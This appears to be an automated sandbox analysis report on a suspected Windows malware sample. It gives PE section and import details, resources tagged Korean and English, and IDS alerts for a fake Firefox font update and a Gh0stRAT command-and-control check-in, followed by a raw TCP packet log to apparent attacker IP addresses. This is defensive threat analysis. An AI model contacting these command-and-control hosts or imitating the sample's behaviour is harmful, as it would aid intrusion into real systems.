                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x13a580x8c.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d750000x16160.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d740000x9f0.pdata
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x110000x448.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000xf4600xf6001f425a98276bfc9bdd5eb9b3e6fd532fFalse0.5487328506097561data6.272999725128285IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rdata0x110000x38a20x3a00567bea2370032df0a4a68549b87738edFalse0.38671875data5.259463020184805IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0x150000x1d5e7a00x1d5a4008c291ce4219f6b73a0067f6ea4e9804eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .pdata0x1d740000x9f00xa0055d48cc2cb7c69e5403c98363ed8f7efFalse0.505078125data4.863870555815326IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .rsrc0x1d750000x161600x1620057e5f624472e054b8c81735653589dd4False0.8123786193502824data7.322560899525773IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_ICON0x1d765e80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.6223347547974414
                                                                            RT_ICON0x1d774900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.7369133574007221
                                                                            RT_ICON0x1d77d380x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.3829479768786127
                                                                            RT_ICON0x1d782a00xdab6PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004643686372567
                                                                            RT_ICON0x1d85d580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5300829875518672
                                                                            RT_ICON0x1d883000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6137429643527205
                                                                            RT_ICON0x1d893a80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.425531914893617
                                                                            RT_DIALOG0x1d75b780x1fcdataEnglishUnited States0.4822834645669291
                                                                            RT_DIALOG0x1b4600x1b0dataKoreanNorth Korea1.025462962962963
                                                                            RT_DIALOG0x1b4600x1b0dataKoreanSouth Korea1.025462962962963
                                                                            RT_DIALOG0x1d75d780x57adataEnglishUnited States0.3880171184022825
                                                                            RT_DIALOG0x1b7400x438dataKoreanNorth Korea1.010185185185185
                                                                            RT_DIALOG0x1b7400x438dataKoreanSouth Korea1.010185185185185
                                                                            RT_DIALOG0x1d756100x12edataKoreanNorth Korea0.7086092715231788
                                                                            RT_DIALOG0x1d756100x12edataKoreanSouth Korea0.7086092715231788
                                                                            RT_STRING0x1d8a5580x464dataEnglishUnited States0.38256227758007116
                                                                            RT_STRING0x2fde80x2eeTarga image data - Map (257-257) 257 x 257 x 1 +257 +257 - 1-bit alpha "\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001"KoreanNorth Korea0.02
                                                                            RT_STRING0x2fde80x2eeTarga image data - Map (257-257) 257 x 257 x 1 +257 +257 - 1-bit alpha "\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001"KoreanSouth Korea0.02
                                                                            RT_STRING0x1d8a9c00x112dataEnglishUnited States0.5109489051094891
                                                                            RT_STRING0x300d80xc6Targa image data - Map (257-257) 257 x 257 x 1 +257 +257 - 1-bit alpha "\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001"KoreanNorth Korea0.06060606060606061
                                                                            RT_STRING0x300d80xc6Targa image data - Map (257-257) 257 x 257 x 1 +257 +257 - 1-bit alpha "\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001"KoreanSouth Korea0.06060606060606061
                                                                            RT_STRING0x1d8aad80x3a8dataEnglishUnited States0.37606837606837606
                                                                            RT_STRING0x301a00x21cTarga image data - Map (257-257) 257 x 257 x 1 +257 +257 - 1-bit alpha "\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001"KoreanNorth Korea0.027777777777777776
                                                                            RT_STRING0x301a00x21cTarga image data - Map (257-257) 257 x 257 x 1 +257 +257 - 1-bit alpha "\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001"KoreanSouth Korea0.027777777777777776
                                                                            RT_STRING0x1d8ae800x2dcdataEnglishUnited States0.412568306010929
                                                                            RT_STRING0x303c00x198Targa image data - Map (257-257) 257 x 257 x 1 +257 +257 - 1-bit alpha "\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001"KoreanNorth Korea0.03431372549019608
                                                                            RT_STRING0x303c00x198Targa image data - Map (257-257) 257 x 257 x 1 +257 +257 - 1-bit alpha "\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001"KoreanSouth Korea0.03431372549019608
                                                                            RT_GROUP_ICON0x1d898100x68dataEnglishUnited States0.7019230769230769
                                                                            RT_VERSION0x1d762f80x2f0SysEx File - IDPEnglishUnited States0.46675531914893614
                                                                            RT_MANIFEST0x1d898780x56aXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.43001443001443

                                                                            Imports

                                                                            DLLImport
                                                                            USER32.dllEndDialog, MessageBoxA, LoadStringA, GetWindowRect, SystemParametersInfoA, GetSystemMetrics, GetDlgItem, SendMessageA, ShowWindow, SetWindowPos, PostMessageA, SetWindowTextA, GetWindowTextA, GetDesktopWindow, DialogBoxParamA, wsprintfA
                                                                            ADVAPI32.dllRegQueryValueExA, RegOpenKeyExA, RegCreateKeyExA, RegSetValueExA, RegCloseKey
                                                                            SHELL32.dllSHGetPathFromIDListA, SHGetSpecialFolderLocation, SHFileOperationA, SHBrowseForFolderA
                                                                            ole32.dllCoInitialize, CoUninitialize, CoCreateInstance, CoTaskMemFree
                                                                            VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
                                                                            KERNEL32.dllHeapSize, HeapReAlloc, ReadFile, SetFilePointer, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetLocaleInfoA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SuspendThread, GetStringTypeW, GetStringTypeA, LCMapStringW, LCMapStringA, GetSystemTimeAsFileTime, GetCurrentProcessId, GetTickCount, QueryPerformanceCounter, SetThreadLocale, SetThreadUILanguage, LocalFree, lstrcatA, FormatMessageA, GetVersionExA, OpenFileMappingA, CloseHandle, FindNextFileA, FindClose, CreateDirectoryA, lstrcmpiA, FindFirstFileA, DeleteFileA, CreateFileA, GetTempFileNameA, GetDriveTypeA, lstrlenA, lstrcpyA, WaitForSingleObject, ResumeThread, MultiByteToWideChar, GetLastError, CreateProcessA, lstrcmpA, WriteFile, GetSystemDefaultLangID, CreateFileMappingA, GetModuleFileNameA, ExpandEnvironmentStringsA, MulDiv, MoveFileExA, CopyFileA, CreateThread, HeapFree, HeapAlloc, GetModuleHandleW, Sleep, GetProcAddress, ExitProcess, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, HeapSetInformation, HeapCreate, GetStdHandle, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, EncodePointer, DecodePointer, FlsGetValue, FlsSetValue, FlsFree, SetLastError, GetCurrentThreadId, FlsAlloc, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, RtlUnwindEx, LoadLibraryA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, VirtualAlloc, GetFileType

                                                                            Possible Origin

                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            EnglishUnited States
                                                                            KoreanNorth Korea
                                                                            KoreanSouth Korea

                                                                            Network Behavior

                                                                            Suricata IDS Alerts

                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2025-01-15T09:02:24.238892+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44973039.103.20.17443TCP
                                                                            2025-01-15T09:02:26.119657+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44973139.103.20.17443TCP
                                                                            2025-01-15T09:02:28.077156+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44973239.103.20.17443TCP
                                                                            2025-01-15T09:02:30.444095+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44973839.103.20.17443TCP
                                                                            2025-01-15T09:02:36.741487+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44974039.103.20.17443TCP
                                                                            2025-01-15T09:02:38.350198+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44974139.103.20.17443TCP
                                                                            2025-01-15T09:02:46.198704+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44974239.103.20.17443TCP
                                                                            2025-01-15T09:02:47.912210+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44974339.103.20.17443TCP
                                                                            2025-01-15T09:03:43.489269+01002852901ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin1192.168.2.4500188.217.35.2538917TCP

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 15, 2025 09:02:22.981043100 CET49730443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:22.981142044 CET4434973039.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:22.981221914 CET49730443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:22.982671022 CET49730443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:22.982686043 CET4434973039.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:24.238688946 CET4434973039.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:24.238892078 CET49730443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:24.240259886 CET4434973039.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:24.240334988 CET49730443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:24.243242979 CET49730443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:24.243271112 CET4434973039.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:24.243741989 CET4434973039.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:24.284853935 CET49730443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:24.376416922 CET49730443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:24.419341087 CET4434973039.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:24.710474014 CET4434973039.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:24.710632086 CET4434973039.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:24.710686922 CET49730443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:24.720994949 CET49730443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:24.721024990 CET4434973039.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:24.721034050 CET49730443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:24.721039057 CET4434973039.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:24.872827053 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:24.872884035 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:24.872947931 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:24.873214960 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:24.873228073 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.119580030 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.119657040 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.120687962 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.120747089 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.121891022 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.121905088 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.122590065 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.123275995 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.163342953 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.444940090 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.445007086 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.445077896 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.445105076 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.445147991 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.445152044 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.445200920 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.445204973 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.446429968 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.446495056 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.446502924 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.446728945 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.450381041 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.450457096 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.532332897 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.532468081 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.532526970 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.532526970 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.532563925 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.532622099 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.532687902 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.532738924 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.532779932 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.532839060 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.533457041 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.533515930 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.533852100 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.533915997 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.536056042 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.536113977 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.536169052 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.536223888 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.538120031 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.538182020 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.584898949 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.584976912 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.619874001 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.619972944 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.620064974 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.620116949 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.620171070 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.620225906 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.620616913 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.620671034 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.620717049 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.620767117 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.620805979 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.620861053 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.621263027 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.621320963 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.621367931 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.621426105 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.621468067 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.621519089 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.622035027 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.622093916 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.622242928 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.622297049 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.622709036 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.622769117 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.623549938 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.623670101 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.625329018 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.625386953 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.625421047 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.625482082 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.707364082 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.707429886 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.707505941 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.707560062 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.707613945 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.707664967 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.707711935 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.707762003 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.707814932 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.707981110 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.708030939 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.790273905 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.790273905 CET49731443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.790309906 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.790328979 CET4434973139.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.830553055 CET49732443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.830647945 CET4434973239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:26.830760002 CET49732443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.833028078 CET49732443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:26.833100080 CET4434973239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:28.077048063 CET4434973239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:28.077156067 CET49732443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:28.079807997 CET4434973239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:28.079891920 CET49732443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:28.081121922 CET49732443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:28.081147909 CET4434973239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:28.081976891 CET4434973239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:28.083864927 CET49732443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:28.131341934 CET4434973239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:28.429426908 CET4434973239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:28.429491043 CET4434973239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:28.429569006 CET49732443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:28.429601908 CET4434973239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:28.429630041 CET4434973239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:28.429677963 CET49732443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:28.429686069 CET4434973239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:28.429876089 CET4434973239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:28.429922104 CET49732443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:28.429929972 CET4434973239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:28.432225943 CET49732443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:28.649791956 CET4434973239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:28.649877071 CET49732443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:28.649925947 CET4434973239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:28.649991035 CET49732443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:28.650036097 CET4434973239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:28.650091887 CET49732443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:28.650952101 CET4434973239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:28.651015997 CET49732443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:28.651045084 CET4434973239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:28.651101112 CET49732443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:28.651768923 CET4434973239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:28.651843071 CET49732443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:28.651865959 CET4434973239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:28.651923895 CET49732443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:28.886531115 CET4434973239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:28.886612892 CET49732443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:28.886646986 CET4434973239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:28.886703968 CET49732443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:28.886746883 CET4434973239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:28.886811972 CET49732443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:28.886832952 CET4434973239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:28.886885881 CET49732443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:28.887151003 CET4434973239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:28.887213945 CET49732443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:28.887239933 CET4434973239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:28.887298107 CET49732443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:28.888046026 CET4434973239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:28.888112068 CET49732443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:28.888169050 CET4434973239.103.20.17192.168.2.4
                                                                            Jan 15, 2025 09:02:28.888228893 CET49732443192.168.2.439.103.20.17
                                                                            Jan 15, 2025 09:02:28.889013052 CET4434973239.103.20.17192.168.2.4
